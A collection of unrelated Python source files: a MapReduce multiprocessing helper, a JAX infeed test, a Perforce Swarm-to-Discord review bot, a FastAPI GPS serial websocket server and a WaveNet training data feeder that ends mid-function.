@function.Defun(capture_resource_var_by_value=False)
def tpu_computation():
return tpu.rewrite(computation, args)
return tpu_functional.TPUPartitionedCall(
args=tpu_computation.captured_inputs,
device_ordinal=tpu_ops.tpu_ordinal_selector(),
Tout=[o.type for o in tpu_computation.definition.signature.output_arg],
f=tpu_computation)
return batched_tpu_computation(*inputs_to_tpu)
|
map_reduce.py
|
"""
This is a multiprocessing-based map reduce computing model.
It's different from normal MapReduce model:
- Manager fires up mapper and reducer processes simultaneously: Output of mapper is identical to reducer, \
so reducers don't need to wait until all mappers finish.
- Data can be passed to mapper gradually: Mappers are waiting to consume data until user tells them no more new data \
will be added.
- Reducing is not between two mapper's output (though the api to user is as this) \
but output and context: Data pickling (serialization) and unpickling \
(unserialization) for IPC are time consuming. As an alternation, each reducer process holds a context \
which aggregates output in reducing step. \
Once all output is reduced, reducing will be among contexts.
- It doesn't support shuffling and reduce-by-key.
Example::
def mapper(x):
time.sleep(0.0001)
return x
def reducer(r1, r2):
return r1 + r2
mr = MapReduce(8, mapper, reducer)
mr.start()
for i in range(10000):
mr.add_task(i)
mr.task_done()
result = mr.join()
print(result)
"""
__all__ = ['MapReduce']
import multiprocess as mp
import multiprocess.queues as mpq
import queue
from typing import Callable
import sys
import logging
import uuid
import pickle
import math
from pyrallel import Paralleller
logger = logging.getLogger('MapReduce')
logger.setLevel(logging.ERROR)
stdout_handler = logging.StreamHandler(sys.stdout)
stdout_handler.setFormatter(logging.Formatter('%(asctime)-15s %(name)s [%(levelname)s] %(message)s'))
logger.addHandler(stdout_handler)
class ChunkedQueue(mpq.Queue):
CHUNK_SIZE = 512 * 1024 * 1024
def __init__(self, *args, **kwargs):
ctx = mp.get_context()
super().__init__(*args, **kwargs, ctx=ctx)
self.buff = {}
def put(self, obj, block=True, timeout=None):
if not block:
return super().put(obj=obj, block=False, timeout=timeout)
chunk_size = self.__class__.CHUNK_SIZE
msg_id = uuid.uuid4()
msg_bytes = pickle.dumps(obj)
num_of_chunks = math.ceil(len(msg_bytes) / chunk_size)
logger.debug('putting data: #%s [%d], size: %d', msg_id, num_of_chunks, len(msg_bytes))
for i in range(num_of_chunks):
msg_obj = {
'b': msg_bytes[i * chunk_size : (i + 1) * chunk_size], # body
'u': msg_id, # msg id
'i': i + 1, # chunk id
'n': num_of_chunks # total number of chunks
}
super().put(obj=msg_obj, block=block, timeout=timeout)
def get(self, block=True, timeout=None):
if not block:
return super().get(block=False, timeout=timeout)
while True:
msg_obj = super().get(block=block, timeout=timeout)
logger.debug('getting data: #%s [%d/%d]', msg_obj['u'], msg_obj['i'], msg_obj['n'])
# small message
if msg_obj['u'] not in self.buff and msg_obj['i'] == msg_obj['n']:
return pickle.loads(msg_obj['b'])
# chunked message
if msg_obj['u'] not in self.buff:
self.buff[msg_obj['u']] = [None] * msg_obj['n']
self.buff[msg_obj['u']][msg_obj['i']-1] = msg_obj['b']
if msg_obj['i'] == msg_obj['n']:
msg = pickle.loads(b''.join(self.buff[msg_obj['u']]))
del self.buff[msg_obj['u']]
return msg
class MapReduce(Paralleller):
"""
Args:
num_of_process (int): Number of process for both mappers and reducers.
mapper (Callable): Mapper function. The signature is `mapper(*args, **kwargs) -> object`.
reducer (Callable): Reducer function. The signature is `reduce(object, object) -> object`.
`object` arguments are the returns from `mapper` s.
mapper_queue_size (int, optional): Maximum size of mapper queue, 0 by default means unlimited.
reducer_queue_size (int, optional): Maximum size of reduce queue, 0 by default means unlimited.
"""
CMD_NO_NEW_DATA = 1 # no more new user data
CMD_MAPPER_FINISH = 2 # mapper finished
CMD_REDUCER_WAITING = 3 # reducer is waiting
CMD_NO_RUNNING_MAPPER = 4 # no mapper is running
CMD_REDUCER_AWAKE = 5 # awake a reducer
CMD_REDUCER_KILL = 6 # kill a reducer
CMD_REDUCER_FINISH = 7 # reducer finished
def __init__(self, num_of_process: int, mapper: Callable, reducer: Callable,
mapper_queue_size: int = 0, reducer_queue_size: int = 0):
self._mapper_queue = mp.Queue(maxsize=mapper_queue_size)
self._reducer_queue = ChunkedQueue(maxsize=reducer_queue_size)
self._result_queue = ChunkedQueue()
self._mapper_cmd_queue = [mp.Queue() for _ in range(num_of_process)]
self._reducer_cmd_queue = [mp.Queue() for _ in range(num_of_process)]
self._manager_cmd_queue = mp.Queue()
self._manager_process = mp.Process(target=self._run_manager)
self._mapper_process = [mp.Process(target=self._run_mapper, args=(i, ))
for i in range(num_of_process)]
self._reducer_process = [mp.Process(target=self._run_reducer, args=(i, ))
for i in range(num_of_process)]
self._mapper = mapper
self._reducer = reducer
self._num_of_process = num_of_process
def start(self):
"""
Start all child processes.
"""
# start manager, mapper and reducer processes
self._manager_process.start()
for m in self._mapper_process:
m.start()
for r in self._reducer_process:
r.start()
def add_task(self, *args, **kwargs):
"""
Add data.
Args:
args: Same to args in `mapper` function.
kwargs: Same to kwargs in `mapper` function.
"""
self._mapper_queue.put( (args, kwargs) )
def task_done(self):
"""
No more new task.
"""
# no more user data
self._manager_cmd_queue.put( (self.__class__.CMD_NO_NEW_DATA,) )
def join(self):
"""
This method blocks until all mappers and reducers finish.
Returns:
object: The final reduced object.
"""
# reduced result
result = self._result_queue.get()
# make sure all child processes exited
# (do this after clean up all queues to avoid deadlock
# https://docs.python.org/3.6/library/multiprocessing.html?highlight=process#all-start-methods
# "Joining processes that use queues")
for m in self._mapper_process:
m.join()
for r in self._reducer_process:
r.join()
self._manager_process.join()
return result
def _run_manager(self):
running_mapper = [1 for _ in range(self._num_of_process)] # running mappers, 1 is running
running_reducer = [1 for _ in range(self._num_of_process)] # running reducers, 1 is running
waiting_reducer = [0 for _ in range(self._num_of_process)] # waiting reducers, 1 is waiting
killing_reducer = [0 for _ in range(self._num_of_process)] # killing reducers, 1 is asked to kill
# only return the index where mask shows 1
def apply_mask(mask):
for idx, m in enumerate(mask):
if m == 1:
yield idx
while True:
try:
cmd = self._manager_cmd_queue.get(timeout=0.1)
# no more user data, notify all mappers
if cmd[0] == self.__class__.CMD_NO_NEW_DATA:
for q in self._mapper_cmd_queue:
q.put( (self.__class__.CMD_NO_NEW_DATA,) )
# a mapper finished
elif cmd[0] == self.__class__.CMD_MAPPER_FINISH:
idx = cmd[1]
running_mapper[idx] = 0
# notify reducers if all mappers are finished
if sum(running_mapper) == 0:
for r in self._reducer_cmd_queue:
r.put( (self.__class__.CMD_NO_RUNNING_MAPPER,) )
# a reducer is waiting
# if all reducers are waiting,
# ask half of them to kill themselves and release held resources (context),
# after being killed, wake up rest of the reducers
elif cmd[0] == self.__class__.CMD_REDUCER_WAITING:
idx = cmd[1]
waiting_reducer[idx] = 1
logger.info('waiting reducer #%d', idx)
# total num of running reducers
running_reducer_num = len(list(apply_mask(running_reducer)))
logger.info('running reducer num %d', running_reducer_num)
# only one reducer and nothing to reduce anymore
if running_reducer_num == 1:
# kill last reducer
idx = next(apply_mask(running_reducer))
self._reducer_cmd_queue[idx].put( (self.__class__.CMD_REDUCER_KILL,) )
# return result to main process
self._result_queue.put(self._reducer_queue.get())
return
# total num of waiting reducers
waiting_reducer_num = len(list(filter(lambda x: x > 0,
[waiting_reducer[idx] for idx in apply_mask(running_reducer)])))
logger.info('waiting reducer num %d', waiting_reducer_num)
logger.info('waiting reducer status %s', str(waiting_reducer))
# need to kill half of the reducers and release resources
if running_reducer_num == waiting_reducer_num:
# reset waiting reducer (for next round)
waiting_reducer = [0 for _ in range(self._num_of_process)]
# pick half of them to kill, notify these reducers
kill_reducer_num = running_reducer_num - int(running_reducer_num / 2)
notified_kill_reducer_num = 0
for idx in apply_mask(running_reducer):
self._reducer_cmd_queue[idx].put( (self.__class__.CMD_REDUCER_KILL,) )
killing_reducer[idx] = 1
notified_kill_reducer_num += 1
logging.info('killing reducer #%d', idx)
if kill_reducer_num == notified_kill_reducer_num:
break
# make sure these reducers are killed
while True:
cmd = self._manager_cmd_queue.get()
# other command, put it back
if cmd[0] != self.__class__.CMD_REDUCER_FINISH:
self._manager_cmd_queue.put(cmd)
else:
idx = cmd[1]
# reset state for killed reducer
running_reducer[idx] = 0
killing_reducer[idx] = 0
logger.info('reducer killed #%d', idx)
# all killed, wake up rest of the reducers
if sum(killing_reducer) == 0:
for idx in apply_mask(running_reducer):
logger.info('awaking reducer #%d', idx)
self._reducer_cmd_queue[idx].put( (self.__class__.CMD_REDUCER_AWAKE,) )
break
except queue.Empty:
continue
def _run_mapper(self, idx):
no_new_data = False
while True:
# cmd
try:
cmd = self._mapper_cmd_queue[idx].get_nowait()
if cmd[0] == self.__class__.CMD_NO_NEW_DATA:
no_new_data = True
except queue.Empty:
pass
# data
try:
data = self._mapper_queue.get(timeout=0.1)
args, kwargs = data[0], data[1]
result = self._mapper(*args, **kwargs)
self._reducer_queue.put(result)
except queue.Empty:
# no more new data, mapper finishes
if no_new_data:
self._manager_cmd_queue.put( (self.__class__.CMD_MAPPER_FINISH, idx) )
return
continue
def _run_reducer(self, idx):
no_running_mapper = False
context = None # it holds result of last reducing, and can be used in next reducing
while True:
# cmd
try:
cmd = self._reducer_cmd_queue[idx].get_nowait()
if cmd[0] == self.__class__.CMD_NO_RUNNING_MAPPER:
no_running_mapper = True
except queue.Empty:
pass
# data
try:
if context is None: # can't use "not" operator here, context could be empty object (list, dict, ...)
context = self._reducer_queue.get(timeout=0.1)
m = self._reducer_queue.get(timeout=0.1)
context = self._reducer(context, m)
except queue.Empty:
# there are still some alive mappers, wait for their output
if not no_running_mapper:
continue
# no data in reducer queue, ask manager and wait for further action
self._manager_cmd_queue.put( (self.__class__.CMD_REDUCER_WAITING, idx) )
cmd = self._reducer_cmd_queue[idx].get()
# awake
if cmd[0] == self.__class__.CMD_REDUCER_AWAKE:
continue
# kill itself, put context back to reducer queue
elif cmd[0] == self.__class__.CMD_REDUCER_KILL:
if context is not None:
self._reducer_queue.put(context)
self._manager_cmd_queue.put( (self.__class__.CMD_REDUCER_FINISH, idx) )
return
|
infeed_test.py
|
# Copyright 2019 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import threading
from absl.testing import absltest
import jax
from jax import lax, numpy as jnp
from jax import config
from jax.experimental import host_callback as hcb
from jax.lib import xla_client
import jax.test_util as jtu
import numpy as np
config.parse_flags_with_absl()
FLAGS = config.FLAGS
class InfeedTest(jtu.JaxTestCase):
def testInfeed(self):
@jax.jit
def f(x):
token = lax.create_token(x)
(y,), token = lax.infeed(
token, shape=(jax.ShapedArray((3, 4), jnp.float32),))
(z,), _ = lax.infeed(
token, shape=(jax.ShapedArray((3, 1, 1), jnp.float32),))
return x + y + z
x = np.float32(1.5)
y = np.reshape(np.arange(12, dtype=np.float32), (3, 4)) # np.random.randn(3, 4).astype(np.float32)
z = np.random.randn(3, 1, 1).astype(np.float32)
device = jax.local_devices()[0]
device.transfer_to_infeed((y,))
device.transfer_to_infeed((z,))
self.assertAllClose(f(x), x + y + z)
def testInfeedPytree(self):
x = np.float32(1.5)
y = np.reshape(np.arange(12, dtype=np.int16), (3, 4))
to_infeed = dict(a=x, b=y)
to_infeed_shape = dict(a=jax.ShapedArray((), dtype=np.float32),
b=jax.ShapedArray((3, 4), dtype=np.int16))
@jax.jit
def f(x):
token = lax.create_token(x)
res, token = lax.infeed(token, shape=to_infeed_shape)
return res
device = jax.local_devices()[0]
# We must transfer the flattened data, as a tuple!!!
flat_to_infeed, _ = jax.tree_flatten(to_infeed)
device.transfer_to_infeed(tuple(flat_to_infeed))
self.assertAllClose(f(x), to_infeed)
def testInfeedThenOutfeed(self):
hcb.stop_outfeed_receiver()
@jax.jit
def f(x):
token = lax.create_token(x)
y, token = lax.infeed(
token, shape=jax.ShapedArray((3, 4), jnp.float32))
token = lax.outfeed(token, y + np.float32(1))
return x - 1
x = np.float32(7.5)
y = np.random.randn(3, 4).astype(np.float32)
execution = threading.Thread(target=lambda: f(x))
execution.start()
device = jax.local_devices()[0]
device.transfer_to_infeed((y,))
out, = device.transfer_from_outfeed(
xla_client.shape_from_pyval((y,)).with_major_to_minor_layout_if_absent())
execution.join()
self.assertAllClose(out, y + np.float32(1))
def testInfeedThenOutfeedInALoop(self):
hcb.stop_outfeed_receiver()
def doubler(_, token):
y, token = lax.infeed(
token, shape=jax.ShapedArray((3, 4), jnp.float32))
return lax.outfeed(token, y * np.float32(2))
@jax.jit
def f(n):
token = lax.create_token(n)
token = lax.fori_loop(0, n, doubler, token)
return n
device = jax.local_devices()[0]
n = 10
execution = threading.Thread(target=lambda: f(n))
execution.start()
for _ in range(n):
x = np.random.randn(3, 4).astype(np.float32)
device.transfer_to_infeed((x,))
y, = device.transfer_from_outfeed(xla_client.shape_from_pyval((x,))
.with_major_to_minor_layout_if_absent())
self.assertAllClose(y, x * np.float32(2))
execution.join()
if __name__ == '__main__':
absltest.main(testLoader=jtu.JaxTestLoader())
|
review.py
|
import p4
import discord
import utils
import net
import time
import re
from threading import Thread, Lock
mutex = Lock()
class p4bot_review:
def __init__(self):
self.storage = p4.Storage()
self.reviews = {}
self.exit_flag = True
try:
self.config = utils.create_config("config.json")
self.discord = discord.Discord(self.config, "review_webhook")
self.perforce = p4.init(self.config)
except AssertionError as error:
mutex.acquire()
self.exit_flag = False
mutex.release()
assert False, error
def get_handler(self, query):
if len(query) > 0:
print '[p4dbot review] recived request ' + str(query)
review = query['review']
status = query["status"]
change = query["change"]
project_name = query["project_name"]
review_data = p4.request_review(self.perforce, review[0])
mutex.acquire()
if review_data['data']['state'] != "archived":
self.need_to_add(review[0], review_data)
mutex.release()
return "{}"
pass
def need_to_add(self, rId, review):
reviewObject = self.reviews.get(rId)
if reviewObject == None:
self.reviews.update({rId: review})
self.notif(review)
else:
self.validate(reviewObject, review)
def validate(self, reviewA, reviewB):
if reviewA['data']['state'] != reviewB['data']['state']:
self.status_changed(reviewB)
return True
elif len(reviewA['comments']) != len(reviewB['comments']):
self.comments_changed(reviewB)
return True
return False
def comments_changed(self, review):
self.reviews.update({review['id']: review})
self.notif(review,True)
def status_changed(self, review):
self.reviews.update({review['id']: review})
self.notif(review)
def clear(self):
return
def process(self):
while self.exit_flag:
for (key, review) in self.reviews.items():
mutex.acquire()
review_data = p4.request_review(self.perforce, key)
if review_data != None:
state = review_data["data"]["state"]
self.need_to_add(key, review_data)
if state == "archived":
del self.reviews[key]
mutex.release()
time.sleep(self.config["pull_interval"])
def find_user(self,user):
for users in self.config['discord']['users']:
if users['swarm'] == user:
return users["discord"]
return user
def mention(self,text,user):
regex = r"(@"+user+")"
subst = "<@"+self.find_user(user)+">"
# You can manually specify the number of replacements by changing the 4th argument
return re.sub(regex, subst, text, 0, re.MULTILINE)
def mentions(self,text):
for users in self.config['discord']['users']:
regex = r"(@"+users['swarm']+")"
subst = "<@"+users['discord']+">"
# You can manually specify the number of replacements by changing the 4th argument
text = re.sub(regex, subst, text, 0, re.MULTILINE)
return text
def notif(self, review,comment = False):
review = review['data']
change = p4.Change()
change.user = review['author']
change.changelist = str(review['changes'][len(review['changes'])-1])
change.review = str(review['id'])
swarm_urls = p4.make_swarm_urls(change, self.perforce)
message = discord.Message()
message.user = change.user
if review['state'] != 'approved':
message.color = 0x7CFC00
elif review['state'] != 'archived':
message.color = 0xFFA500
else:
message.color = 0xc8702a
if not comment:
message.header = "Review #"+str(review['id'])+" Request from " + \
change.user+" Status: "+review['stateLabel']
else:
message.header = "Review #"+str(review['id'])+" Request from " + \
change.user+" New Comment!"
message.content = self.mentions(review['description'])+' Author:'+self.mentions("@"+review['author'])
message.footer = swarm_urls.review
message.url = swarm_urls.review
self.discord.send(message)
return
def init(self):
self.server = net.make_server(
self.config["server"]["host"], self.config["server"]["port"], self)
self.processThread = Thread(target=self.process)
self.processThread.start()
def shutdown(self):
self.server.socket.close()
mutex.acquire()
try:
self.exit_flag = False
finally:
mutex.release()
self.processThread.join()
bot = p4bot_review()
bot.init()
try:
print '[p4dbot review] start the server'
bot.server.serve_forever()
except KeyboardInterrupt:
print '[p4dbot review] shutting down the server'
bot.shutdown()
|
server.py
|
# GPS 协议分析
# http://www.techbulo.com/2508.html
# https://blog.csdn.net/lzyzuixin/article/details/6161507
# https://www.cnblogs.com/happykoukou/p/5502517.html
# 错误解决:WARNING: Unsupported upgrade request.
# http://www.04007.cn/article/977.html
import asyncio, serial, logging, time, os, random
import threading
from typing import Dict
from decimal import Decimal
from threading import Thread
from fastapi import FastAPI, WebSocket
from starlette.websockets import WebSocketState
if os.name == "nt":
SERIAL_PORT = "COM18"
elif os.name == "posix":
SERIAL_PORT = "/dev/ttyUSB0"
os.system(f'sudo chmod 777 {SERIAL_PORT}')
logging.basicConfig(
level=logging.NOTSET,
format='%(asctime)s - %(name)s - %(levelname)s - %(message)s')
logger = logging.getLogger(__name__)
clients = {}
gpsdata = {}
last_gpsdata = {}
ser = serial.Serial(port=SERIAL_PORT, baudrate=38400)
if not ser.is_open:
ser.open()
def convert_coord(value):
"""将GPS值转换为度分秒形式
Args:
value(str): GPS读取的经度或纬度
Returns:
list: 度分秒列表
"""
v1, v2 = value.split('.')
v2_dec = Decimal(f'0.{v2}') * 60 # + Decimal(random.random())
return [v1[:-2], v1[-2:], v2_dec.to_eng_string()]
def login(client_info: Dict[str, WebSocket]):
if client_info.get("id") in clients.keys():
try:
clients.get(client_info.get("id")).close()
except:
pass
clients.update(client_info)
print('客户端数量:', len(clients.items()))
def get_coord():
flag = 0
while True:
try:
if ser.inWaiting():
bin_data = ser.read_until()
# print(bin_data)
data = bin_data.decode().split(',')
if data[0] == "$GNRMC":
cn_time = f"{int(data[1][:2])+8}{data[1][2:6]}".rjust(
6, '0')
cn_time = f"{cn_time[:2]}:{cn_time[2:4]}:{cn_time[4:]}"
date = data[9]
date = f"{date[4:]}-{date[2:4]}-{date[:2]}"
gpsdata.update({
"时间":
cn_time,
"纬度": [*convert_coord(data[3]), data[4]],
"经度": [*convert_coord(data[5]), data[6]],
"速度":
(Decimal(data[7]) * Decimal("1.85")).to_eng_string(),
"方位角":
data[8],
"日期":
date,
})
flag = flag | 0b1
elif data[0] in ["$GPGGA", "$GNGGA"]: # GPS定位或GPS与北斗混合定位
gpsdata.update({
"GPS状态": {
"0": "未定位",
"1": "非差分定位",
"2": "差分定位",
"3": "无效PPS",
"6": "正在估算"
}.get(data[6], "错误"),
"卫里数量": data[7],
"海拔": data[9],
})
flag = flag | 0b10
elif data[0] == "$GPGSA":
gpsdata.update({
"PDOP综合位置精度因子":
data[15],
"HDOP水平精度因子":
data[16],
"VDOP垂直精度因子":
data[17].split('*')[0] if '*' in data[17] else '',
})
flag = flag | 0b100
if flag == 0b111:
flag = 0
else:
time.sleep(0.3)
except:
pass
Thread(target=get_coord).start()
app = FastAPI()
@app.websocket("/ws")
async def websocket_endpoint(websocket: WebSocket):
logging.disable(logging.DEBUG)
await websocket.accept()
async def send_coord():
global last_gpsdata
while True:
try:
asyncio.sleep(0.1)
if gpsdata == last_gpsdata:
continue
await websocket.send_json(gpsdata)
last_gpsdata = gpsdata.copy()
print(threading.current_thread)
except Exception as ex:
if websocket.client_state == WebSocketState.DISCONNECTED:
logger.info(f"websocket缓存子线程退出:{str(ex)}")
break
logger.info(f"websocket缓存子线程出错:{str(ex)}")
try:
while True:
# 监听前端传递的信息
client_info = await websocket.receive_json()
logger.info(('收到websocket客户端指令:', client_info))
if client_info.get("cmd") == "login":
login({client_info.get("id"): websocket})
elif client_info.get("cmd") == "ping":
await websocket.send_json({"ping": "pong"})
elif client_info.get("cmd") == "startupdate":
Thread(target=asyncio.run, args=(send_coord(), )).start()
except Exception as ex:
logger.error(f"websocket断开:{str(ex)}")
|
feeder.py
|
import numpy as np
import tensorflow as tf
from sklearn.model_selection import train_test_split
import time
import threading
import os
from .util import is_scalar_input, is_mulaw_quantize
from infolog import log
from datasets import audio
from keras.utils import np_utils
_batches_per_group = 32
_pad = 0
class Feeder:
"""
Feeds batches of data into queue in a background thread.
"""
def __init__(self, coordinator, metadata_filename, base_dir, hparams):
super(Feeder, self).__init__()
if hparams.gin_channels > 0:
raise NotImplementedError('Global conditioning preprocessing has not been added yet, it will be out soon. Thanks for your patience!')
self._coord = coordinator
self._hparams = hparams
self._train_offset = 0
self._test_offset = 0
#Base directory of the project (to map files from different locations)
self._base_dir = base_dir
#Load metadata
self._data_dir = os.path.dirname(metadata_filename)
with open(metadata_filename, 'r') as f:
self._metadata = [line.strip().split('|') for line in f]
#Train test split
if hparams.wavenet_test_size is None:
assert hparams.wavenet_test_batches is not None
test_size = (hparams.wavenet_test_size if hparams.wavenet_test_size is not None
else hparams.wavenet_test_batches * hparams.wavenet_batch_size)
indices = np.arange(len(self._metadata))
train_indices, test_indices = train_test_split(indices,
test_size=test_size, random_state=hparams.wavenet_data_random_state)
#Make sure test size is a multiple of batch size else round up
len_test_indices = _round_up(len(test_indices), hparams.wavenet_batch_size)
extra_test = test_indices[len_test_indices:]
test_indices = test_indices[:len_test_indices]
train_indices = np.concatenate([train_indices, extra_test])
self._train_meta = list(np.array(self._metadata)[train_indices])
self._test_meta = list(np.array(self._metadata)[test_indices])
self.test_steps = len(self._test_meta) // hparams.wavenet_batch_size
if hparams.wavenet_test_size is None:
assert hparams.wavenet_test_batches == self.test_steps
#Get conditioning status
self.local_condition, self.global_condition = self._check_conditions()
with tf.device('/cpu:0'):
# Create placeholders for inputs and targets. Don't specify batch size because we want
# to be able to feed different batch sizes at eval time.
if is_scalar_input(hparams.input_type):
input_placeholder = tf.placeholder(tf.float32, shape=(None, 1, None), name='audio_inputs')
target_placeholder = tf.placeholder(tf.float32, shape=(None, None, 1), name='audio_targets')
target_type = tf.float32
else:
input_placeholder = tf.placeholder(tf.float32, shape=(None, hparams.quantize_channels, None), name='audio_inputs')
target_placeholder = tf.placeholder(tf.int32, shape=(None, None, 1), name='audio_targets')
target_type = tf.int32
self._placeholders = [
input_placeholder,
target_placeholder,
tf.placeholder(tf.int32, shape=(None, ), name='input_lengths'),
]
queue_types = [tf.float32, target_type, tf.int32]
if self.local_condition:
self._placeholders.append(tf.placeholder(tf.float32, shape=(None, hparams.num_mels, None), name='local_condition_features'))
queue_types.append(tf.float32)
if self.global_condition:
self._placeholders.append(tf.placeholder(tf.int32, shape=(), name='global_condition_features'))
queue_types.append(tf.int32)
# Create queue for buffering data
queue = tf.FIFOQueue(8, queue_types, name='intput_queue')
self._enqueue_op = queue.enqueue(self._placeholders)
variables = queue.dequeue()
self.inputs = variables[0]
self.inputs.set_shape(self._placeholders[0].shape)
self.targets = variables[1]
self.targets.set_shape(self._placeholders[1].shape)
self.input_lengths = variables[2]
self.input_lengths.set_shape(self._placeholders[2].shape)
#If local conditioning disabled override c inputs with None
if hparams.cin_channels < 0:
self.local_condition_features = None
else:
self.local_condition_features = variables[3]
self.local_condition_features.set_shape(self._placeholders[3].shape)
#If global conditioning disabled override g inputs with None
if hparams.gin_channels < 0:
self.global_condition_features = None
else:
self.global_condition_features = variables[4]
self.global_condition_features.set_shape(self._placeholders[4].shape)
# Create queue for buffering eval data
eval_queue = tf.FIFOQueue(1, queue_types, name='eval_queue')
self._eval_enqueue_op = eval_queue.enqueue(self._placeholders)
eval_variables = eval_queue.dequeue()
self.eval_inputs = eval_variables[0]
self.eval_inputs.set_shape(self._placeholders[0].shape)
self.eval_targets = eval_variables[1]
self.eval_targets.set_shape(self._placeholders[1].shape)
self.eval_input_lengths = eval_variables[2]
self.eval_input_lengths.set_shape(self._placeholders[2].shape)
#If local conditioning disabled override c inputs with None
if hparams.cin_channels < 0:
self.eval_local_condition_features = None
else:
self.eval_local_condition_features = eval_variables[3]
self.eval_local_condition_features.set_shape(self._placeholders[3].shape)
#If global conditioning disabled override g inputs with None
if hparams.gin_channels < 0:
self.eval_global_condition_features = None
else:
self.eval_global_condition_features = eval_variables[4]
self.eval_global_condition_features.set_shape(self._placeholders[4].shape)
def start_threads(self, session):
self._session = session
thread = threading.Thread(name='background', target=self._enqueue_next_train_group)
thread.daemon = True #Thread will close when parent quits
thread.start()
thread = threading.Thread(name='background', target=self._enqueue_next_test_group)
thread.daemon = True #Thread will close when parent quits
thread.start()
def _get_test_groups(self):
meta = self._test_meta[self._test_offset]
self._test_offset += 1
if self._hparams.train_with_GTA:
mel_file = meta[2]
else:
mel_file = meta[1]
audio_file = meta[0]
input_data = np.load(os.path.join(self._base_dir, audio_file))
if self.local_condition:
local_condition_features = np.load(os.path.join(self._base_dir, mel_file))
else:
local_condition_features = None
global_condition_features = None
return (input_data, local_condition_features, global_condition_features, len(input_data))
def make_test_batches(self):
start = time.time()
#Read one example for evaluation
n = 1
#Test on entire test set (one sample at an evaluation step)
examples = [self._get_test_groups() for i in range(len(self._test_meta))]
batches = [examples[i: i+n] for i in range(0, len(examples), n)]
np.random.shuffle(batches)
log('\nGenerated {} test batches of size {} in {:.3f} sec'.format(len(batches), n, time.time() - start))
return batches
def _enqueue_next_train_group(self):
while not self._coord.should_stop():
start = time.time()
# Read a group of examples
n = self._hparams.wavenet_batch_size
examples = [self._get_next_example() for i in range(n * _batches_per_group)]
# Bucket examples base on similiar output length for efficiency
examples.sort(key=lambda x: x[-1])
batches = [examples[i: i+n] for i in range(0, len(examples), n)]
np.random.shuffle(batches)
log('\nGenerated {} train batches of size {} in {:.3f} sec'.format(len(batches), n, time.time() - start))
for batch in batches:
feed_dict = dict(zip(self._placeholders, self._prepare_batch(batch)))
self._session.run(self._enqueue_op, feed_dict=feed_dict)
def _enqueue_next_test_group(self):
test_batches = self.make_test_batches()
while not self._coord.should_stop():
for batch in test_batches:
feed_dict = dict(zip(self._placeholders, self._prepare_batch(batch)))
self._session.run(self._eval_enqueue_op, feed_dict=feed_dict)
def _get_next_example(self):
'''Get a single example (input, output, len_output) from disk
'''
if self._train_offset >= len(self._train_meta):
self._train_offset = 0
np.random.shuffle(self._train_meta)
meta = self._train_meta[self._train_offset]
self._train_offset += 1
if self._hparams.train_with_GTA:
mel_file = meta[2]
if 'linear' in mel_file:
raise RuntimeError('Linear spectrogram files selected instead of GTA mels, did you specify the wrong metadata?')
else:
mel_file = meta[1]
audio_file = meta[0]
input_data = np.load(os.path.join(self._base_dir, audio_file))
if self.local_condition:
local_condition_features = np.load(os.path.join(self._base_dir, mel_file))
else:
local_condition_features = None
global_condition_features = None
return (input_data, local_condition_features, global_condition_features, len(input_data))
def _prepare_batch(self, batch):
np.random.shuffle(batch)
#Limit time steps to save GPU Memory usage
max_time_steps = self._limit_time()
#Adjust time resolution for upsampling
batch = self._adjust_time_resolution(batch, self.local_condition, max_time_steps)
#time lengths
input_lengths = [len(x[0]) for x in batch]
max_input_length = max(input_lengths)
inputs = self._prepare_inputs([x[0] for x in batch], max_input_length)
targets = self._prepare_targets([x[0] for x in batch], max_input_length)
local_condition_features = self._prepare_local_conditions(self.local_condition, [x[1] for x in batch])
global_condition_features = self._prepare_global_conditions(self.global_condition, [x[2] for x in batch])
new_batch = (inputs, targets, input_lengths)
if local_condition_features is not None:
new_batch += (local_condition_features, )
if global_condition_features is not None:
new_batch += (global_condition_features, )
return new_batch
def _prepare_inputs(self, inputs, maxlen):
if is_mulaw_quantize(self._hparams.input_type):
#[batch_size, time_steps, quantize_channels]
x_batch = np.stack([_pad_inputs(np_utils.to_categorical(
x, num_classes=self._hparams.quantize_channels), maxlen) for x in inputs]).astype(np.float32)
else:
#[batch_size, time_steps, 1]
x_batch = np.stack([_pad_inputs(x.reshape(-1, 1), maxlen) for x in inputs]).astype(np.float32)
assert len(x_batch.shape) == 3
#Convert to channels first [batch_size, quantize_channels (or 1), time_steps]
x_batch = np.transpose(x_batch, (0, 2, 1))
return x_batch
def _prepare_targets(self, targets, maxlen):
#[batch_size, time_steps]
if is_mulaw_quantize(self._hparams.input_type):
y_batch = np.stack([_pad_targets(x, maxlen) for x in targets]).astype(np.int32)
else:
y_batch = np.stack([_pad_targets(x, maxlen) for x in targets]).astype(np.float32)
assert len(y_batch.shape) == 2
#Add extra axis (make 3 dimension)
y_batch = np.expand_dims(y_batch, axis=-1)
return y_batch
def _prepare_local_conditions(self, local_condition, c_features):
if local_condition:
maxlen = max([len(x) for x in c_features])
c_batch = np.stack([_pad_inputs(x, maxlen) for x in c_features]).astype(np.float32)
assert len(c_batch.shape) == 3
#[batch_size, c_channels, time_steps]
c_batch = np.transpose(c_batch, (0, 2, 1))
else:
c_batch = None
return c_batch
def _prepare_global_conditions(self, global_condition, g_features):
if global_condition:
g_batch = g_features
else:
g_batch = None
return g_batch
def _check_conditions(self):
local_condition = self._hparams.cin_channels > 0
global_condition = self._hparams.gin_channels > 0
return local_condition, global_condition
def _limit_time(self):
'''Limit time resolution to save GPU memory.
'''
if self._hparams.max_time_sec is not None:
return int(self._hparams.max_time_sec * self._hparams.sample_rate)
elif self._hparams.max_time_steps is not None:
return self._hparams.max_time_steps
else:
return None
def _adjust_time_resolution(self, batch, local_condition, max_time_steps):
'''Adjust time resolution between audio and local condition
'''
if local_condition:
new_batch = []
for b in batch:
x, c, g, l = b
self._assert_ready_for_upsample(x, c)
if max_time_steps is not None:
max_steps = _ensure_divisible(max_time_steps, audio.get_hop_size(self._hparams), True)
if len(x) > max_time_steps:
max_time_frames = max_steps // audio.get_hop_size(self._hparams)
start = np.random.randint(0, len(c) - max_time_frames)
time_start = start * audio.get_hop_size(self._hparams)
x = x[time_start: time_start + max_time_frames * audio.get_hop_size(self._hparams)]
c = c[start: start + max_time_frames, :]
self._assert_ready_for_upsample(x, c)
new_batch.append((x, c, g, l))
